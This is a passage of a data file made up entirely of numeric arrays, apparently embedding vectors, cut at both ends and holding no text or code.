-0.0023786842,-0.028400278,0.029351521,-0.016584901,-0.04861169,0.028093835,-0.022316767,-0.028625961,0.029554872,-0.06187528,0.014918816,-0.0038035747,-0.014810309,0.008602327,0.023293423,0.06832242,-0.04539455,-0.0032353324,-0.012186263,0.03236159,-0.044049904,0.04412181,0.011435583,-0.02353097,-0.014294146,-0.025532596,-0.0705893,-0.041723117,-0.013070525,0.005925074,-0.0126577765,-0.03482665,-0.01579532,-0.07083574,-0.061561428,0.008571345,0.020123053,0.04770363,-0.019611653,-0.02909085,0.015214316,-0.0717592,0.032185845,-0.010003542,0.070010506,-0.013264208,0.006692597,-0.04347371,0.05242061,0.041173283,-0.021921536,0.0063301628,-0.0128113115,-0.0046201134,-0.03634359,0.016856221,-0.03522506,-0.058946412,-0.0012641449,0.029331625,-0.05260266,0.013346069,-0.0020951752,0.024375414,0.0070622386,-0.042014737,0.04224705,-0.0038142398,-0.0026307006,-0.023938749,-0.092596546,0.012814658,-0.0060795834,0.029233107,0.037977833,0.009583307,0.0803782,-0.018722612,0.03497025,0.036985192,0.05980809,-0.05029425,0.033033602,0.0022700506,0.023926111,0.023958702,-0.046067465,-0.017199587,0.05855484,0.0032462012,0.0073365956,-0.016072007,0.01504988,0.029350957,-0.028487006,-0.026144858,-0.015833225,0.030034784,-0.029087566,0.044638447,-0.06616217,-0.008040645,-0.07723945,-0.07273181,-0.050015308,-0.023210749,0.013073289,0.010844665,0.0030246603,0.025258588,0.015150609,0.0060202116,0.004243319,-0.022180682,-0.004592667,-0.011328772,-0.013932651,-0.024686007,0.002580948,-0.029181272,-0.025179282,-0.019761939,-0.010579314,-0.0042753723,0.034602247,0.037038732,0.030960103,0.018808983,0.039961763,0.02478747,-0.0357408,-0.062000047,0.02594996,-0.003096085,0.025705975,0.031001171,0.013398905,0.0017951124,-0.057120595,0.0049153953,0.0047041876,0.012206279,0.031286277,-0.02710798,-0.010759426,-0.0203764,-0.029405244,0.040143136,-0.0062482446,-0.04198663,-0.0031989964,-0.0038128474,0.0093813,-0.023485817,-0.019913714,0.018617472,0.022464493,0.05709403,-0.011942202,0.0166515,-0.027653905,0.030340077,-0.050526522,-0.0011302144,0.053451855,-0.035990518,0.0343309,-0.028606962,-0.010390708,0.016017452,0.04831922,0.024493998,-0.046683546,-0.021435838,0.015517996,0.013098633,-0.008480221,-0.006917989,0.03172729,0.07863701,0.0021074242,0.0008849929,-0.052080598,0.016470274,0.05462989,-0.015383614,0.00018298253,0.052364606,-0.005339395,-0.018472975,0.0593296,-0.008633642,-0.044749003,-0.02717252,0.04512289,0.046709232,-0.007944132,-0.02353286,-0.026722593,0.08333784,0.0073708063,0.04215823,-0.0091823945,-0.04367104,-0.01060748,0.025258534,0.04546383,0.043109402,-0.014953648,0.012250366,-0.052490182,-0.032546107,0.031121826,-0.06450162,-0.02066488,-0.038338725,-0.015551395,0.019315187,0.035340175,0.028624797,-0.015404474,0.03499528,0.037051048,0.031668127,-0.02109015,0.024812236,0.0016746158,0.043705117,0.035722017,-0.0049695363,0.017903144,-0.025263753,-0.015048869,0.020518359,-0.02298003,-0.028326483,0.026598226,0.0036264986,0.039057583,-0.040828586,-0.058432024,-0.0061658425,0.020428047,0.0017032728,-0.0032702682,0.0013027585,-0.043187376,0.05104561,-0.023223821,-0.0132737,0.076721825,-0.031814046,-0.0956355,-0.0035692744,0.011483989,0.07968989,-0.017713964,-0.04436612,-0.05001353,0.015130594,0.043526657,0.035282247,0.016892808,0.03495516,0.02226371,0.04012452,0.025766103,0.021135963,-0.025626315,0.027766282,0.035742782,0.014003002,-0.040207155,-0.047818474,0.0007843711,0.037637316,0.030938972,0.031120298,0.010369558,0.042941142,-0.048540074,0.0259826,-0.042895786,0.04971973,0.037384313,0.036324732,-0.040163506,-0.029514119,0.06778926,0.0041674976,0.01817449,0.057938028,-0.0026067898,0.11270588,-0.03894905,0.0030864233,-0.012762987,0.005917446,0.010406661,0.02717996,0.0058487738,-0.09066254,0.0070173917,0.03754091,-0.032876875,-0.007814461,-0.049563088,0.023154708,0.06400539,-0.03822819,0.023101991,-0.002443233,-0.038087435,0.044453826,0.028076427,0.005150027,0.044279397,0.012512602,0.016081601,0.032422975,-0.019081207,-0.05905521,-0.053044647,-0.03974014,0.0645034,-0.02786362,0.000033654986,-0.0053922497,-0.010140946,0.009448104,0.0021522604,-0.011511349,-0.013857705,-0.051917356,-0.05740904,-0.049586352,0.05047144,0.013247901,0.03537364,-0.012414863,0.033955302,0.009185869,0.009887083,0.06356996,0.015667614,0.06656787,-0.03241115,-0.045261804,-0.0099298805,0.010681265,-0.01652121,-0.0028505102,-0.02295473,0.056006517,-0.030456325,0.013979616,0.006091121,-0.056988508,-0.00639318,-0.030703064,-0.056254003,-0.010373685,-0.03451039,-0.071287476,0.05471019,0.048979156,-0.07897238,0.059190225,0.021302251,-0.0028140957,0.0058087506,-0.0488224,-0.020835115,0.027401242,-0.036094267,-0.035476964,0.010472845,-0.004524743,0.026394628,0.05247276,0.03941823,-0.00551346,-0.00021817916,-0.025627976,-0.029666223,0.00064877985,0.017692966,0.0049295006,-0.069366336,0.04346186,-0.064600356,0.0006533781,-0.060623493,0.033328686,-0.03947595,-0.008488818,-0.04802157,-0.028686954,-0.046501864,-0.046356194,0.05763116,0.037352033,0.022198394,0.00681297,-0.02706346,0.0076312027,0.015592736,0.025433343,0.08414181,0.024832236,-0.08038107,0.009332765,0.028790886,-0.022528976,-0.007688822,-0.007733131,0.018182112,-0.072935656,-0.044781763,0.02704129,-0.0318078,-0.0031977266,0.029763969,-0.04629016,-0.0025075385,-0.072745666,-0.035633154,-0.014319807,-0.010184452,-0.0057626767,0.0008818936,0.023745956,-0.00837212,-0.03470043,0.011960577,-0.029119559,0.02796479,-0.041135024,0.01120234,-0.02181434,0.020898236,0.048980583,-0.044926852,0.010713494,0.10203696,-0.013701112,0.036303107,-0.007063663,0.032161064,0.033930678,0.0030121661,0.009552037,-0.005876759,0.031193038,-0.03330864,0.051978525,-0.013628814,-0.0074054105,-0.015381186,-0.018873855,-0.07639168,0.015886283,-0.022520972,0.034634985,0.00054196775,-0.06036319,-0.038121294,-0.023044044,0.01894357,-0.05098285,0.016183088,-0.03633902,-0.027503036,-0.06861782,0.02484212,-0.02449643,0.02911903,0.023730133,0.0866388,0.024227405,-0.004823808,0.001524452,0.051107265,0.07098874,-0.038152758,-0.00328315,0.047001496,0.0002934789,-0.0010622052,0.05593006,0.13969456,-0.006261569,0.013970433,-0.01081939,-0.026895422,-0.0041438867,-0.035726763,-0.067062914,0.009361341,0.018926103,-0.0042966255,-0.020258054,-0.00088689016,0.008828128,-0.0100666,0.0010062489,-0.019251652,-0.048640337,0.0074525946,0.022924727,0.021822512,0.0024349487,-0.027245063,-0.0050683287,0.04299365,0.01346397,0.079473235,-0.033385623,-0.07453372,0.03231344,0.014378434,-0.01038962,-0.019695288,0.022164509,-0.034061864,0.010815058,0.029440856,-0.039854422,-0.021885894,0.006451507,-0.0428587,0.015658015,-0.025059907,-0.007337692,0.031395536,0.023594465,-0.0049044276,-0.008620453,0.055741254,-0.037359446,0.042284016,0.012128078,0.013093544,0.025216239,-0.00062068034,0.0009168117,0.04543524,-0.006809574,-0.062463984,-0.060871933,0.034601707,-0.011649995,0.07018207,0.025905464,0.042144906,0.024924265,0.025921134,-0.03917407,0.052423358,0.004746305,0.008549878,-0.06810732,-0.008779025,-0.030202199,0.039960302,0.032053724,-0.06463767,-0.017387224,-0.0070214504,-0.022034083,-0.0151629,-0.028259745,0.046505,-0.018941183,-0.019292861,0.026202422,0.0025569815,-0.043512676,-0.03497284,-0.03516705,0.033614762,0.0013631989,0.010016188,0.002014914,-0.03146118,-0.02238184,0.06141709,0.008060612,-0.034957815,0.0091187535,0.005264356,0.026600469,0.021315074,-0.021885281,0.0464282,-0.024221072,0.0647568,0.07968709,0.012538225,0.051924,-0.010378867,0.027833663,-0.0061160335,-0.02046963,-0.0072299843,-0.072155826,-0.028645152],[-0.019361723,0.024317635,-0.17340109,-0.05273748,0.068047464,-0.0054226983,0.0727608,0.017844576,-0.019607387,-0.013302039,0.0000084171315,0.025926905,0.10047198,0.018482106,-0.025781216,-0.04849808,0.019854201,-0.06446893,-0.015563534,0.028706701,-0.005742456,-0.03603824,-0.020283213,-0.042542536,0.043291166,-0.014050205,-0.027618645,0.004100227,-0.021531813,0.0035488221,-0.017515585,-0.01700078,0.034684476,-0.006514268,-0.09498851,-0.05391711,0.0207599,-0.03877856,-0.019116841,0.03521162,0.014496064,0.002552456,0.018283917,-0.060771223,0.014392821,0.018365199,0.078211404,0.021775948,0.050261572,-0.038938317,0.015384258,-0.0047790916,0.01195797,-0.02244242,0.09112578,0.038212225,-0.014369587,0.048814267,-0.0031934374,-0.054962188,0.087126486,0.039690137,-0.09964493,0.0073950104,0.050434053,-0.019070007,-0.010153065,0.051036708,0.029217377,-0.017819641,0.041709397,-0.0037265518,-0.02313113,-0.009090666,-0.014631388,-0.03202645,-0.017225223,-0.05297174,-0.042012677,0.04131721,-0.015281046,-0.011220662,0.0736182,-0.03413392,0.037187867,0.03221423,-0.026252469,0.02411745,-0.039876617,0.046398878,0.010734882,0.024521885,0.08699631,0.0099955555,-0.09711491,0.030601434,-0.021257592,-0.009909863,-0.05515518,-0.04087123,-0.0026652606,0.02002157,0.010609035,-0.02469639,0.018139115,0.0602319,0.017586518,0.026859906,-0.021356674,-0.034387793,-0.05592677,0.027949622,-0.04178727,-0.0053113224,-0.029583402,-0.026853155,0.055462755,0.0046988176,-0.01236282,0.06460691,0.0049568466,-0.035323713,-0.044458926,0.0350272,-0.005374624,0.022867301,-0.07765149,0.032457765,-0.027323801,-0.01501506,-0.012625792,-0.02489821,-0.018081693,-0.010723567,0.024360428,0.045681298,-0.051830497,-0.016166706,0.040141486,0.016669419,0.029593239,0.012271681,-0.024963332,-0.007494103,0.02845379,-0.018705878,0.039810453,-0.019409826,-0.055532258,0.017681226,-0.0016384835,0.025979389,0.004025582,-0.022197336,0.055069752,-0.009350543,0.007445204,-0.009423104,-0.002481349,0.020533282,0.054480344,-0.03286532,-0.03530623,0.061515316,-0.038994003,-0.031350482,0.013866528,0.03119705,0.055328704,0.014946504,-0.029777644,-0.08759352,0.00030692952,0.011475434,0.029722858,-0.0014269353,0.12032309,-0.02654194,-0.030620122,-0.02743089,0.027113128,-0.059610058,0.033111643,0.010455901,-0.0029531175,-0.042577367,0.0007119517,0.025688939,-0.008065148,-0.0440407,-0.0036618172,-0.0231608,-0.0459398,-0.03601181,-0.042562228,-0.052611805,0.034056257,-0.008795078,0.034460522,-0.0091275945,-0.019723501,-0.02888054,-0.04179658,0.03275932,-0.049880162,0.031014867,0.017928887,0.038009737,-0.015914213,0.024473252,0.038723197,0.018068682,0.013892953,0.060261566,0.011693587,-0.013719925,0.010030944,-0.0022916403,-0.025637554,-0.018750742,0.024997035,-0.025967373,-0.022323346,0.023453053,0.03069949,0.012868835,-0.0068905083,-0.020453326,-0.01685758,0.03383525,-0.010923304,-0.06886063,0.028247282,-0.01828497,-0.019986425,0.03197253,0.024869064,0.044337332,0.0045946473,-0.011681668,-0.029874058,0.041485995,-0.010708382,0.011301382,-0.06895739,-0.028682308,0.02887174,-0.016609168,-0.003721984,0.015722238,-0.047277223,0.03164225,0.0066720736,-0.032004215,0.04242831,-0.06010203,-0.00632102,-0.0010650777,-0.013823348,0.015471476,-0.015136509,-0.008863582,0.0511792,0.0047330204,-0.043172974,-0.053155553,0.014238901,0.0030934692,-0.011129821,-0.03162472,-0.023506194,0.046281148,0.021332892,0.047918174,0.012171642,0.001268311,-0.0054333005,-0.011942138,-0.011991901,-0.0050587035,-0.0100783855,-0.062337622,-0.03731914,-0.0030138555,0.015361665,0.008003774,0.018067205,-0.0038754977,0.003005896,0.014464217,-0.012452205,-0.041989084,-0.03107699,0.00049053854,-0.018797582,0.017773103,0.036960598,-0.0207821,0.011724897,-0.031181412,-0.0015656785,0.034587346,0.032467235,0.024715962,0.0042880313,0.0030230763,-0.020499812,-0.022311768,-0.0075652846,0.006283311,-0.035879098,0.012484723,-0.0277829,-0.014499159,-0.033209506,0.014473497,0.021337723,0.053643797,0.029442728,-0.04707942,0.00060611765,-0.045697384,0.0040051686,-0.070725754,-0.0031792037,0.05898116,-0.034553654,0.06287941,-0.0056917868,-0.026445018,0.06438047,0.013519175,0.0063800677,-0.04266922,-0.039633594,-0.009714922,-0.013310155,0.024227269,0.028740577,0.01648903,0.078082494,-0.040665273,0.015880654,-0.040007003,-0.008227608,0.016837997,-0.02267759,-0.0022237261,0.07488784,0.010647544,0.014318297,0.016226007,-0.01323395,0.008707156,0.05579825,0.021609034,0.03732377,0.046571102,0.00097571936,-0.009527106,0.037660874,-0.006566218,0.0068206866,-0.013485611,0.018602736,-0.011505776,0.03197225,-0.020921115,0.028857814,-0.023102589,0.010757779,-0.024997057,-0.028413849,0.035295922,0.013698555,0.012519455,-0.07288715,0.03949621,0.009268986,0.004817273,0.0013578259,0.02157219,-0.018364038,-0.0077939187,0.020061372,0.033698417,0.00019283722,-0.027725343,-0.012092215,-0.0128585,0.0040942957,-0.07208459,-0.06821937,0.0031275717,0.043636452,-0.022489637,0.0126232905,0.008329455,-0.0055736755,0.052729353,-0.04857216,-0.06865121,0.042569935,0.004969562,-0.003935384,0.051522236,-0.042023815,-0.01124776,0.013586208,0.05079392,0.0060188114,0.01654051,-0.016428715,-0.084423915,0.008866682,-0.0017209478,0.051740933,0.043071393,-0.035955686,0.0028210157,0.034589656,0.011771085,0.010265061,0.004779663,-0.0045314105,0.029509515,0.054913405,0.06619688,0.019029243,-0.08756809,0.057880025,0.012434762,0.031745564,0.0096083395,-0.016736683,0.013155575,0.0108375,0.030987669,-0.0010063002,0.027538419,0.05495196,-0.032900494,-0.030551193,-0.0376133,0.02094994,0.0771471,0.066706985,-0.038950372,-0.094870746,0.013654239,-0.0003945311,0.012010072,0.039336115,0.01765354,0.07550619,0.005543063,0.049139418,0.0041611767,0.020365981,0.047437593,0.0024903652,0.013226814,-0.055230368,0.037930183,0.008199763,-0.024476752,0.004487458,-0.015111511,0.02110386,0.05559031,-0.03798705,-0.025353389,0.07458134,-0.0045107566,0.013734268,0.014423071,-0.017431187,-0.013089928,0.047472473,0.04427686,0.0010827048,-0.059617173,-0.048978508,-0.036602248,0.009112722,0.035130695,0.03946938,-0.008683497,-0.014073276,-0.013172291,0.05524449,0.02153688,0.00447137,-0.0075433776,-0.038705297,-0.05877771,-0.029778382,0.02738058,0.027088644,-0.0071136486,0.019330435,0.036398772,-0.0042591994,0.0008179912,-0.0072517833,-0.020266265,0.051374134,-0.09904172,-0.035230394,0.0069334316,-0.018007975,0.039959546,0.06737351,0.016815132,0.0036583622,-0.05183869,0.018464783,0.023617301,0.0077650473,-0.008193855,0.04188295,-0.016187496,-0.023477245,-0.010736207,-0.089952454,-0.00551157,-0.03965948,-0.054589026,0.025609115,-0.005195622,0.050811656,0.05421583,-0.045662,-0.009538087,-0.0079238415,-0.027703207,-0.0065802354,0.03997952,0.019710062,0.017505962,-0.0019238266,0.054487802,0.05278606,-0.019418633,0.043593805,0.002393491,-0.033067003,0.04692195,-0.009417246,-0.04582924,-0.011518323,-0.033815347,0.031562056,-0.014190675,0.03886334,0.010263074,-0.044029623,-0.014034399,0.012459102,-0.005058969,-0.030416979,0.022225508,0.06613439,0.017468201,0.014045729,-0.026560001,-0.021668578,-0.01454296,-0.019034475,0.07583185,0.030821335,-0.065238066,0.012531447,-0.021542644,-0.00327336,-0.020296507,0.038573436,0.012379589,-0.052774016,-0.06626286,0.036983002,-0.04863167,0.01483125,0.018145697,-0.055862203,0.006851137,-0.047079362,-0.020412,0.003840896,-0.022087505,-0.003512969,-0.015033573,0.0424551,-0.031015528,-0.007804389,0.016321601,0.022619687,0.01092545,-0.014885819,-0.03917742,0.028896155,0.036511857,0.06157616,-0.024971414,-0.0024117597,0.053910065,-0.017977765,0.022254163,0.016958037,-0.01050698,0.019602966,-0.007029344,-0.0051596896,-0.018823672,0.0013915387,-0.03530557,0.02243849,-0.0053024287,-0.0024165548,-0.014161437,-0.017652689,-0.05802499,0.05668538,-0.087892786,0.030054681,-0.031622734,-0.0014245453,-0.037193242,0.03612616,0.0395046,-0.03424247,-0.0018965194,-0.06476691,0.02334984,-0.09395218,0.048070513,-0.040457822,0.040266875,-0.0069816336,0.067424886,0.07451979,-0.010000685,-0.015919257,0.0060735974,0.027527332,-0.01545544,0.046537664,0.09970146,0.044453897,-0.02639062,0.07191898,0.08342971,0.0072805933,-0.021086216,0.0037673397,0.04673853,0.003286806,-0.0050653843,-0.009053736,-0.03376063,-0.0072553335,-0.032300584,-0.06211016,-0.0055111665,0.022646194,-0.04399314,-0.034273226,-0.00021471565,-0.015204381,-0.028430128,0.050691213,0.020336855,-0.007982868,-0.007549489,0.012049337,-0.0075083496,0.004595676,0.04477233,-0.033890303,-0.05216064,-0.027869161,-0.015050336,0.028620113,-0.039261024,-0.014276713,-0.050367195,0.008167643,-0.031106193,-0.020127937,-0.014006932,-0.044174924,-0.042523254,-0.016568152,-0.0065106656,-0.06572634,0.07206547,-0.011897937,-0.008492122,-0.015069547,0.10023108,0.015565055,0.029516963,-0.040282357,0.04568988,0.025579559,-0.040988468,0.04241938,-0.010905036,0.01972369,-0.06833133,-0.02582411,0.025402317,-0.041101307,0.07165921,-0.032736436,0.032145016,-0.030435586,0.0025238132,-0.020406384,0.023419788,0.06303374,-0.01675902,-0.042334132,0.037041873,0.016769316,-0.029840343,0.0014921846,0.01794224,0.03263965,0.015312173,-0.02380943,-0.084395796,-0.061027993,0.07243331,0.018133359,0.011895164,-0.020784566,-0.012242915,-0.057956085,0.009199734,-0.051872306,0.04638428,0.022772571,-0.008135083,-0.00051240745,-0.04761646,-0.03774492,0.04061075,0.016830312,-0.040016178,-0.012834324,-0.016349968,-0.016733326,0.0291919,-0.064483605,0.0070171906,0.028494863,0.011103001,0.120009065,-0.01915092,0.032745034,0.0014311434,0.025632909,0.0052480367,-0.062955104,-0.01422195,-0.03567397,-0.042499673],[0.0012182671,0.060288582,-0.16477728,-0.10027727,0.06040499,-0.063556515,0.010434413,0.031021595,-0.024098258,-0.028443659,-0.0706077,0.021577086,0.06056371,-0.0009776385,0.02784941,-0.025328316,-0.021172775,-0.07024077,-0.030307725,0.039067954,0.015951943,0.036122285,-0.021349307,-0.09565456,0.07057719,0.037154034,-0.005448614,0.0075031566,-0.033218395,-0.030015854,0.0121941045,-0.036113758,-0.012704428,0.024690129,-0.042823084,-0.017935975,0.02543154,-0.0030706136,-0.019723171,0.006158785,0.06283165,0.0617154,-0.012923126,-0.03078893,-0.011781976,0.02601512,0.04379037,-0.017617816,0.07888971,-0.09700067,0.0408045,-0.025757454,0.0077244597,-0.013748985,0.048829067,0.02861414,-0.050917275,-0.015697276,0.0076957312,-0.044704977,0.0893182,0.07749925,-0.0668671,0.052081272,0.0072164126,-0.040625002,-0.029903669,0.03684317,0.034770116,-0.03570824,0.037795655,0.008773475,-0.0386161,0.053835336,-0.0406341,-0.005445304,-0.017712414,0.0044983863,0.021098686,0.072175145,-0.036493763,-0.021459052,0.07927445,0.033521585,0.061782844,-0.018448157,-0.058746573,0.010077573,-0.051455174,0.09638625,0.006822025,-0.031087935,0.017828602,0.0144892875,-0.068328194,0.03004296,0.027158543,0.04753784,-0.044844747,-0.03681658,-0.021857679,-0.018543897,0.015907345,0.0011531209,0.009474912,0.059471786,-0.0014711086,0.050000127,-0.04862861,0.008000245,-0.038014542,0.011205453,-0.024804832,0.0018302021,-0.009843818,-0.008479933,0.06074649,-0.00085334305,-0.025700467,0.042179085,-0.009992593,-0.050754108,0.0046686693,0.031663552,0.0071929293,-0.029337045,-0.03572704,-0.012711623,0.027009198,-0.043047935,-0.032243744,-0.02732276,-0.005328659,0.014222566,0.034790747,0.058452334,-0.016198931,-0.00927206,-0.010140602,-0.018317355,0.01458872,0.0322305,0.00002162328,-0.010107617,0.0045966483,-0.048200376,-0.006688284,-0.033074863,-0.015865836,-0.00042453778,0.01827379,0.019623231,0.013529467,-0.015911065,0.030014556,0.004873208,0.015726674,-0.009196994,-0.024170922,0.093856156,-0.0034254724,-0.014410319,0.004301551,0.06758988,0.021590153,-0.03091922,0.0014780824,0.025600884,-0.019384809,0.05465906,-0.07698911,0.00354283,-0.010469267,-0.013974128,0.03175197,0.0059447605,0.054945767,-0.06991695,-0.030568121,-0.040045343,0.029134518,-0.022135973,0.03222462,0.056619857,-0.021279395,-0.009399859,0.0287889,-0.05385969,0.035210926,-0.015399921,-0.003426553,0.010654687,-0.06601726,-0.015344534,-0.07251477,-0.020712577,0.036064446,0.022102157,0.016282173,-0.034078185,-0.061123006,-0.016482951,-0.044038206,-0.018562272,-0.019000454,0.018449944,-0.0072132316,0.01842741,-0.021936823,0.01842543,0.058860365,0.015004638,-0.026237795,0.009113257,-0.010781199,0.022924632,0.00014281948,-0.027235603,-0.011863686,-0.0036926998,0.02286032,-0.016828569,0.00921703,0.015734699,-0.0010670023,0.02931904,-0.04729914,0.006360069,-0.01723122,-0.024467854,0.021971313,-0.09220402,0.012475186,-0.03435261,-0.008458044,0.023966692,-0.013635006,0.06469733,-0.033465583,0.018000232,0.0068725375,0.06741213,-0.036715195,-0.0020743397,-0.020989645,-0.006949999,-0.009829293,-0.05498816,0.020923348,0.07092032,0.00014892197,-0.03815313,0.010966164,0.01962504,0.032756433,-0.021980569,-0.03603523,-0.0030104392,0.024503272,0.023141807,0.014100102,-0.008043226,0.06839206,-0.068156414,-0.001912052,-0.03414654,-0.026608057,0.009632463,0.05024319,0.021105463,0.039300952,0.046135064,0.009999751,0.064549744,0.0053722495,0.020077603,0.01956058,-0.0081527885,-0.05089639,0.03936031,-0.03333108,-0.00085826515,-0.011812296,-0.008865729,0.012834857,0.006485029,-0.020397142,-0.013340992,0.004193866,0.06259916,-0.005472288,-0.015923195,-0.045329724,0.060879003,0.0029851217,0.049719878,0.028363463,0.02007694,-0.012421044,-0.06795443,0.023469081,0.018362198,0.051313113,0.072488666,0.016948054,-0.031703036,-0.010904827,0.022422684,0.023940649,-0.022040455,-0.052155465,0.0313502,-0.027619183,0.023344252,-0.025667438,0.05186017,0.06039763,0.002333831,0.021411842,0.018428791,0.033664577,-0.044063237,0.050708845,-0.0722338,0.0045389347,0.07297919,-0.017307088,0.03598506,-0.047668867,0.028920729,0.03985999,0.0016934689,0.01682339,-0.031557824,-0.049629066,0.029951422,-0.0022179955,0.009356157,0.032246247,0.047768604,0.1019714,0.01268981,0.037380368,-0.041642334,0.023848766,0.009459592,-0.024999231,-0.008975756,0.0415118,0.018102303,-0.01086376,0.000051039813,0.018668517,-0.023700656,0.011543083,0.01124312,0.017782984,0.041879307,0.018443758,-0.027114997,0.061312027,0.023863222,0.04326835,0.017365474,-0.006236995,0.008637077,0.0402769,-0.012579472,-0.008570487,-0.00849187,-0.013495505,-0.031049525,-0.029498331,0.030523507,-0.036516868,-0.0005437295,-0.04676691,0.034734573,0.0021431542,0.04232875,0.033290908,-0.008911136,0.0076519703,0.00036257182,0.0100438185,-0.06255041,-0.009855513,-0.01515401,0.016126812,-0.01636072,-0.039765988,0.018392181,-0.024540415,-0.006103301,0.028304119,-0.027728222,0.04189386,-0.00049349124,0.016698131,0.041241143,-0.044634733,-0.047225766,0.009984425,0.011305456,-0.01732592,0.021387719,-0.026229624,-0.028172815,0.09497514,-0.0124501195,0.007058018,0.013751191,-0.026271686,0.002602294,0.0020279232,-0.014907443,0.04831382,0.024997205,0.004535481,0.0051443814,0.017760934,0.050630134,0.013339913,0.01875003,-0.0059393914,0.009388142,0.010897755,0.02861976,0.009692493,-0.05454152,0.057148706,0.00071865204,0.036116023,-0.007216785,-0.027820285,-0.020820076,0.01652085,0.08932571,-0.006141898,0.008677828,0.038243502,-0.057325143,-0.004187132,-0.038528014,0.006886524,0.07763646,0.03822128,-0.05577495,-0.038092393,0.039582983,0.057366792,0.039963663,0.047748934,0.01170436,0.09695109,-0.044477522,-0.02115756,-0.008218555,0.03501523,0.01782372,-0.004374315,0.08562809,-0.04917451,0.019786596,0.010660814,-0.009579172,-0.010349771,-0.020615837,0.07536319,0.095165014,-0.079232655,-0.020747101,-0.0041026967,-0.026461188,0.0035099923,0.018714985,-0.006517298,-0.01199977,-0.00030945096,0.029931605,0.02213516,-0.051669788,-0.025234398,-0.035701983,-0.03847299,0.04218588,-0.009597662,-0.036496624,0.0016680955,0.009346131,0.017265856,0.011460366,0.035429247,0.006325683,-0.025992954,-0.082906745,0.0054712407,0.000498541,0.010161403,0.016679367,0.053413045,0.042066872,-0.0074321167,-0.0037372445,0.035864826,-0.041703697,0.04815697,-0.04911089,-0.06313918,0.013767701,-0.016731039,0.00064668676,-0.0082229,-0.0130081745,0.016781928,0.0015285141,0.03377522,0.0099803815,-0.061953004,-0.03295731,-0.0061300383,-0.01576708,-0.012662754,0.01755356,-0.034973733,-0.013945838,0.015075015,-0.04597945,0.004384118,-0.0038836976,0.028622298,0.018418519,-0.049337916,-0.0025107237,0.024857862,0.008352393,-0.033329796,0.016833205,0.012024285,0.06250908,0.04658521,0.020724006,0.021317458,0.02394122,0.0031887835,-0.051638488,-0.008329148,0.016699208,-0.029835422,-0.0931308,0.027244125,-0.049178127,0.01857901,-0.016499443,0.031899977,-0.059085857,0.027423376,-0.019402334,-0.023654023,-0.023406733,-0.05064701,0.018563822,0.053813346,0.03977629,0.02047902,-0.06511463,0.007903871,-0.04221618,-0.003558341,0.013933748,0.0032345532,-0.051278017,-0.02843529,-0.011547887,0.009054108,-0.0033754522,0.02135755,-0.0035540566,-0.05962791,-0.06327131,0.0124665685,-0.019790573,0.00030374443,0.021551482,-0.063188955,0.0034867306,-0.063857496,-0.06327796,0.019469218,-0.04055172,-0.03280755,0.03545157,0.012246338,-0.0067164153,0.0126178,0.009689331,-0.0032135965,0.0024144885,-0.053162403,-0.07243155,0.00014922525,-0.02614067,0.047030576,-0.048616,0.0065345108,0.053274464,-0.00686098,0.021549381,-0.029990481,-0.020154249,0.024425847,-0.015651966,-0.013900784,-0.04326221,0.047877222,-0.0660592,0.03082365,0.014785538,0.0047092983,-0.035778407,-0.00039970884,-0.07613031,0.013021806,-0.07222212,0.024568295,0.01254074,-0.0138321,-0.054031175,0.0071611577,0.024516977,-0.041666295,0.015321757,-0.040841524,-0.03301585,-0.10863623,0.02243905,-0.049212605,0.04014813,-0.020971874,0.021066463,0.01389998,-0.010488273,0.032428246,0.030536572,0.046007216,-0.012469628,0.012982288,0.046730105,0.043704815,-0.02790886,0.05166073,0.07710075,-0.0017600681,0.033766147,-0.005215478,0.008854877,0.045983702,-0.04225962,-0.07149005,-0.025114236,-0.012275409,-0.00586944,-0.038244635,-0.03955013,0.018599924,-0.020675665,0.014040457,-0.0065411204,-0.038287546,-0.016744858,0.04312786,0.007408556,0.029573042,-0.045076836,0.018375764,0.004331183,0.031177478,0.044183277,-0.039234016,-0.026490688,-0.023524936,0.004725258,0.029210811,-0.062335793,0.006272987,-0.010871106,0.0035413373,-0.011002295,-0.021066893,-0.037989996,-0.028960453,-0.03138877,-0.0037393891,0.0033978783,0.045030806,0.03023186,-0.006300734,-0.03305884,-0.038682524,0.093497455,-0.026236497,0.02494118,0.015276555,0.028861435,-0.01636409,0.008508108,-0.006573454,0.010379253,0.008052209,-0.065213375,0.004493106,-0.01998828,-0.023843385,0.033887744,0.010908791,0.031598043,-0.023596158,-0.060385287,-0.0074386583,0.023455262,0.058588352,0.007076074,-0.027252229,-0.011922428,-0.00044415987,0.009314802,0.068631455,-0.012145755,0.013289915,0.007762605,0.023510197,-0.01626853,-0.033825032,0.03605752,-0.011384316,0.027848288,0.001586346,-0.009813607,-0.072574414,-0.035289437,-0.06193536,0.067648135,-0.042284526,0.0034722486,-0.01009042,0.0021265177,-0.07959217,0.0129996175,0.00079692603,-0.038363803,0.043541454,-0.035167444,0.021076372,-0.014182696,-0.025553659,0.0070135645,0.026600609,0.026303489,0.13185093,-0.0046992716,0.0147193745,-0.010435035,0.023911158,0.027864192,-0.064824946,-0.019318495,-0.028282361,-0.01387232],[0.06811299,0.026171744,-0.15775606,-0.07824679,0.0497266,-0.07454772,0.055458277,0.04770863,-0.053546198,-0.05452846,0.0025007913,0.017456066,0.0795806,-0.0110926395,0.0139080705,-0.009609768,-0.016093602,-0.04237204,-0.012850469,0.025402946,-0.0028731688,0.039126735,0.02225064,-0.05957288,0.055468984,0.0015608742,-0.006868472,-0.017817738,-0.018898282,0.006629591,0.03958294,-0.03754993,-0.033001814,-0.010722645,-0.05341496,-0.02856425,0.030236708,0.029077878,-0.016827809,0.03211063,0.031836133,0.019720612,0.013901578,-0.07919168,0.035783377,0.05249121,0.045924116,-0.008923335,0.067233354,-0.093311355,-0.018602848,0.027062157,-0.001905006,0.018879581,0.0936726,0.06631502,0.002101106,0.003403138,-0.008652977,-0.022840068,0.07360348,0.075823046,-0.08968008,0.08075977,-0.022914466,-0.039798517,-0.023453133,0.026890108,0.017320536,-0.03508752,0.041423097,0.039107632,-0.018757368,0.056735095,-0.07503493,-0.022326855,-0.00056797976,0.013757952,-0.015875662,0.048351947,-0.0009776022,-0.02102006,0.1145427,0.042057175,0.030486498,-0.017906437,-0.010615132,-0.00031248952,-0.02629781,0.057801772,-0.017365864,-0.026141768,0.04708006,0.0011111117,-0.054124407,0.03372579,0.0094875265,0.030341819,-0.055618715,-0.039203282,-0.011828652,-0.028251458,0.017091753,0.018106692,0.0038257842,0.031201389,0.015799548,0.026425226,-0.011494509,0.0025883894,-0.035361275,0.020806575,-0.046896335,-0.022066869,0.024440778,-0.032269116,0.10432156,-0.0194694,-0.014164661,0.00014784324,-0.027430044,-0.0714872,0.0010231226,0